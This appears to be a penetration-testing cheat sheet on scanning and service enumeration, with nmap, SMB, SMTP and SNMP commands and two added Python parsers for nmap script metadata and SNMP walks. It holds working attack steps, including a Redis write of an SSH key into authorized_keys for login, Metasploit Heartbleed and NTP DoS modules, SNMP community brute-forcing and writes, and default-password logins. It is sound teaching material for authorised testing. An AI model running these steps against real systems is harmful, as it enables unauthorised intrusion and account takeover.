Penetration Testing: Scanning (hsaad.gitbook.io)
TCP Behavior
Send   Receive                  Result
SYN    SYN-ACK                  Port Open
SYN    RST-ACK                  Port Closed
SYN    ICMP Port Unreachable    Blocked by Firewall (Filtered)
SYN    Nothing                  Blocked by Firewall (Filtered)

UDP Behavior
Send   Receive                  Result
UDP    UDP response             Port Open
UDP    ICMP Port Unreachable    Port Closed OR Blocked by Firewall
UDP    Nothing                  Port Closed OR Blocked by Firewall OR Port Open but the service only answers a specific UDP payload; nmap reports this as Open|Filtered
Port Scanning
# Host Discovery (Internal)
nmap -sn 192.168.43.164 --reason -v -n
# Host Discovery (External)
nmap -sn 8.8.8.8 --reason -v -n
How nmap -sn decides a host is up:
ARP requests, if the target is on the local network.
ICMP echo requests, if run as root.
TCP SYN packet to port 443.
TCP ACK packet to port 80.
# TCP Port Scanning
nmap 192.168.43.164 --reason -v -n
# UDP Port Scanning
nmap 8.8.8.8 -Pn -sU -p53,161 -v -n
# Mixed TCP/UDP Port Scanning
nmap 192.168.1.1 -sS -sU -p U:53,111,161,T:21-25,80,445
# Wireshark Filters (SYN-ACK replies; all traffic on port 80)
ip.addr==192.168.43.164 and tcp.flags.ack==1 and tcp.flags.syn==1
ip.addr==192.168.43.164 and tcp.port==80
# Print Top 10 TCP Ports (by frequency column in nmap-services)
sort -r -k3 /usr/share/nmap/nmap-services | grep "/tcp" | head -n 10
# Scan Top 10 Ports
nmap 8.8.8.8 --reason -v -n --top-ports 10
# Version Scanning
nmap 192.168.43.164 --reason -v -n -sV
Vulnerability Scanning
# Scripts Location
ls -l /usr/share/nmap/scripts/
grep -E "vuln|exploit" /usr/share/nmap/scripts/script.db
nmap 192.168.43.164 --reason -v -n -sV --script vuln,exploit
nmap 192.168.43.164 --reason -v -n -sV --script default # Or -sC
nmap 192.168.43.164 --reason -v -n --script smb-vuln*
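`script.db` is what `--script vuln,exploit` is resolved against: one `Entry { filename = "...", categories = { ... } }` line per script, so a grep on "vuln|exploit" also matches filenames and tells you nothing about whether a script is `intrusive`. The following is an added example, not code from the original page or from nmap: it parses that format, reproduces the category union that `--script vuln,exploit` selects, and the intersection that nmap's boolean form `--script "vuln and safe"` selects, which is how you pick the checks that will not disturb a production host. The path is the Kali default used above; `SAMPLE_DB` is constructed in the real file's format (script names are real NSE scripts, the category sets are illustrative).

```python
"""List NSE scripts by category from nmap's script.db.
Added example, not part of the original page; SAMPLE_DB is constructed."""
import re
from collections import defaultdict

SCRIPT_DB = "/usr/share/nmap/scripts/script.db"   # Kali/Debian default path

SAMPLE_DB = """\
Entry { filename = "acarsd-info.nse", categories = { "safe", "discovery", } }
Entry { filename = "http-vuln-cve2017-5638.nse", categories = { "vuln", "intrusive", } }
Entry { filename = "smb-vuln-ms17-010.nse", categories = { "vuln", "safe", } }
Entry { filename = "http-shellshock.nse", categories = { "exploit", "vuln", "intrusive", } }
Entry { filename = "ssl-heartbleed.nse", categories = { "vuln", "safe", } }
"""

ENTRY_RE = re.compile(r'filename\s*=\s*"([^"]+)".*?categories\s*=\s*\{([^}]*)\}')
CAT_RE = re.compile(r'"([^"]+)"')


def parse_script_db(text):
    """Return {script filename: set of categories}."""
    scripts = {}
    for line in text.splitlines():
        m = ENTRY_RE.search(line)
        if m:
            scripts[m.group(1)] = set(CAT_RE.findall(m.group(2)))
    return scripts


def load_script_db(path=SCRIPT_DB):
    """Parse the installed script.db (not used by the offline test)."""
    with open(path, encoding="utf-8") as fh:
        return parse_script_db(fh.read())


def scripts_in_any(scripts, *cats):
    """Union: what `--script vuln,exploit` selects."""
    return sorted(n for n, c in scripts.items() if c & set(cats))


def scripts_in_all(scripts, *cats):
    """Intersection: what `--script "vuln and safe"` selects."""
    return sorted(n for n, c in scripts.items() if set(cats) <= c)


def by_category(scripts):
    """Invert the mapping: {category: sorted script filenames}."""
    groups = defaultdict(list)
    for name, cats in scripts.items():
        for c in cats:
            groups[c].append(name)
    return {c: sorted(v) for c, v in groups.items()}


if __name__ == "__main__":
    db = parse_script_db(SAMPLE_DB)
    print("vuln or exploit :", scripts_in_any(db, "vuln", "exploit"))
    print("vuln and safe   :", scripts_in_all(db, "vuln", "safe"))
    print("vuln and intrusive:", scripts_in_all(db, "vuln", "intrusive"))
```

Before running `--script vuln,exploit` against anything that matters, list the intersection with `intrusive`: those scripts send traffic that can crash or alter the service, and nmap's boolean selector (`--script "vuln and not intrusive"`) lets you leave them out.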
Enumeration
FTP (21)
nc 10.0.2.9 21
> USER anonymous
> PASS anonymous
ftp 10.0.2.9 21
> help
> ascii | binary
> pwd # print current directory on remote host
> ls # list files on remote host
> lcd # print current directory on local host
> !ls # list files on local host
> get /home/test/file.txt /home/msfadmin/file.txt # download files
> put /home/msfadmin/file.txt /home/test/file2.txt # upload files
SMTP (25)
# Telnet
telnet 192.168.1.104 25
# method 1 (VRFY)
> VRFY msfadmin
# method 2 (RCPT)
> MAIL FROM:msfadmin
> RCPT TO:msfadmin
# method 3 (EXPN)
> EXPN msfadmin
# Metasploit
use auxiliary/scanner/smtp/smtp_enum
# SMTP-User-Enum: Users
smtp-user-enum -M VRFY -U unix_users.txt -t 192.168.1.104
# SMTP-User-Enum: Email addresses (appends the domain)
smtp-user-enum -M VRFY -D mega.local -U unix_users.txt -t 192.168.1.104
# Users Wordlists
/usr/share/metasploit-framework/data/wordlists/unix_users.txt
/usr/share/seclists/Usernames/Names/names.txt
HTTP/HTTPS (80,443)
Note: Hostnames may be found in the SSL certificate, in DNS, or in the page source code.
# Directory Brute Force
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56/cgi-bin/ -f -x php,txt,conf,sh,cgi
# SSL Cert Dump (Subject Alternative Names)
echo | openssl s_client -connect 10.0.2.9:443 2>/dev/null | openssl x509 -noout -text | grep DNS:
# Heartbleed check
nmap -sV --script=ssl-heartbleed 192.168.101.8
# Exploit (Metasploit)
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 192.168.101.8
set verbose true
run
POP3 (110)
telnet 192.168.1.105 110
> USER pelle@192.168.1.105
> PASS admin
# List all emails
> list
# Retrieve email number 5, for example
> retr 5
RPCbind (111)
SMB (139,445)
# Who runs SMB (NetBIOS name scan)
nbtscan -r 192.168.100.0/24
# NULL Session
rpcclient -U "" -N 10.0.2.4
> enumdomusers
> queryuser 0x3e8
# Session with username and password
rpcclient -U "test" 10.0.2.4
# Enum4Linux (-U users, -S shares, -P password policy, -G groups)
enum4linux -{U|S|P|G} 10.0.2.4
enum4linux -{U|S|P|G} -u TestUser -p TestPass 192.168.100.200
# List Shares
smbmap -H 192.168.0.34
smbmap -u TestUser -p TestPass -H 192.168.0.34
smbclient -L 192.168.0.76
smbclient -U TestUser -L 192.168.0.70
# Access Shares
smbclient //192.168.0.70/tmp
smbclient -U TestUser //192.168.0.70/tmp
NFS (2049)
# Show exported partitions
showmount -e 192.168.1.109
# Mount a specific export
mount 192.168.1.109:/ /tmp/NFS
# Disconnect
umount /tmp/NFS
MySQL (3306)
# Try default passwords: root OR toor OR empty
mysql -h 192.168.1.101 -u root -p
distcc (3632)
# distcc v1 exploit
https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Redis (6379)
# Generate a key pair and pad the public key with newlines so it survives the RDB dump
ssh-keygen -t rsa -f outkey
(echo -e "\n\n"; cat outkey.pub; echo -e "\n\n") > foo.txt
# Store it in a Redis key
cat foo.txt | redis-cli -h 127.0.0.1 -x set crackit
# Point the dump file at the user's .ssh directory and save
redis-cli -h 127.0.0.1
> ping
> config get dir
> config get *
> config set dir /home/user/.ssh
> config set dbfilename authorized_keys
> save
# Log in with the private key
ssh -i outkey redis@127.0.0.1
# Crack a passphrase-protected private key with John
wget https://raw.githubusercontent.com/koboi137/john/bionic/ssh2john.py
python ssh2john.py outkey > outkey.txt
john --wordlist=/usr/share/wordlists/rockyou.txt outkey.txt
DNS (53)
# Lookup, reverse lookup & Zone Transfer
host domain.name 8.8.8.8
host 1.1.1.1 8.8.8.8
host -t axfr domain.name dns-server
# Information Disclosure (BIND hostname / version via CHAOS class)
dig @41.217.225.50 hostname.bind txt chaos
dig @41.217.225.50 version.bind txt chaos
NTP (123)
# NTP Mode 6 Query
ntpq -c rv <IP>
# Metasploit
use scanner/ntp/ntp_unsettrap_dos
SNMP (161)
# Find SNMP hosts, then brute-force community strings
nmap -sU --open -p 161 192.168.1.0/24
onesixtyone -c community.txt 192.168.1.244
onesixtyone -c community.txt -i ips.txt
# SNMP walk & set
snmpwalk -v1 -c public -t 10 192.168.1.244 > snmp.txt
snmpwalk -v1 -c public 192.168.1.244 iso.3.6.1.2.1.6.13.1.3 # Open TCP ports (tcpConnLocalPort)
snmpset -v1 -c private 10.0.2.10 iso.3.6.1.2.1.1.5.0 s Hacked
# Metasploit
msfconsole
> use auxiliary/scanner/snmp/snmp_enum
> set rhosts 192.168.1.244
> run
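The `iso.3.6.1.2.1.6.13.1.3` walk above dumps the `tcpConnLocalPort` column of the TCP connection table; its OID index is `localAddr.localPort.remAddr.remPort`, so every line already carries the socket 4-tuple, and walking the whole table (`.6.13.1`) adds the `tcpConnState` column (2 = listen, 5 = established). The following is an added example, not code from the original page or from net-snmp: it parses that numeric output into listening ports, network-reachable listeners and live connections, which is exactly what a readable `public` community string hands to anyone on the network. `SAMPLE_WALK` is constructed in net-snmp's `-v1` numeric format; the addresses are sample values.

```python
"""Turn a snmpwalk of the TCP connection table (iso.3.6.1.2.1.6.13.1) into
listening ports and live connections. Added example, not from the original
page; SAMPLE_WALK is constructed in net-snmp's numeric output format."""
import re

# Row OID: <table>.<column>.localAddr.localPort.remAddr.remPort = INTEGER: value
ROW_RE = re.compile(
    r"^iso\.3\.6\.1\.2\.1\.6\.13\.1\.(\d+)"              # column: 1=state, 3=localPort
    r"\.(\d+\.\d+\.\d+\.\d+)\.(\d+)"                     # local address, local port
    r"\.(\d+\.\d+\.\d+\.\d+)\.(\d+) = INTEGER: (\d+)$"   # remote address, port, value
)
LISTEN, ESTABLISHED = 2, 5  # tcpConnState values (RFC 1213)

SAMPLE_WALK = """\
iso.3.6.1.2.1.6.13.1.1.0.0.0.0.22.0.0.0.0.0 = INTEGER: 2
iso.3.6.1.2.1.6.13.1.1.0.0.0.0.80.0.0.0.0.0 = INTEGER: 2
iso.3.6.1.2.1.6.13.1.1.127.0.0.1.3306.0.0.0.0.0 = INTEGER: 2
iso.3.6.1.2.1.6.13.1.1.192.168.1.244.22.192.168.1.10.51234 = INTEGER: 5
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.22.0.0.0.0.0 = INTEGER: 22
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.80.0.0.0.0.0 = INTEGER: 80
iso.3.6.1.2.1.6.13.1.3.127.0.0.1.3306.0.0.0.0.0 = INTEGER: 3306
iso.3.6.1.2.1.6.13.1.3.192.168.1.244.22.192.168.1.10.51234 = INTEGER: 22
"""


def parse_walk(text):
    """Return {(laddr, lport, raddr, rport): {column: value}}."""
    rows = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # other OIDs, blanks, "End of MIB" lines
        col, laddr, lport, raddr, rport, value = m.groups()
        key = (laddr, int(lport), raddr, int(rport))
        rows.setdefault(key, {})[int(col)] = int(value)
    return rows


def listening(rows):
    """Sorted (laddr, port) for sockets in LISTEN state. If only column 3 was
    walked (as in the command on this page) there is no state, so fall back
    to rows whose remote side is the 0.0.0.0:0 wildcard."""
    out = set()
    for (laddr, lport, raddr, rport), cols in rows.items():
        if 1 in cols:
            if cols[1] == LISTEN:
                out.add((laddr, lport))
        elif raddr == "0.0.0.0" and rport == 0:
            out.add((laddr, lport))
    return sorted(out, key=lambda t: (t[1], t[0]))


def exposed_ports(rows):
    """Listening ports not bound to loopback: what the network can reach."""
    return sorted({p for a, p in listening(rows) if not a.startswith("127.")})


def established(rows):
    """Live connections: who is talking to this host right now."""
    return sorted(k for k, c in rows.items() if c.get(1) == ESTABLISHED)


if __name__ == "__main__":
    rows = parse_walk(SAMPLE_WALK)
    print("listening  :", listening(rows))
    print("exposed    :", exposed_ports(rows))
    print("established:", established(rows))
```

The established list is the part worth showing to whoever owns the device: a default or guessed community string reveals not only which ports are open but which internal hosts are connected to them, so the fix is to move to SNMPv3 or restrict the agent to the monitoring host's address, not just to change the string.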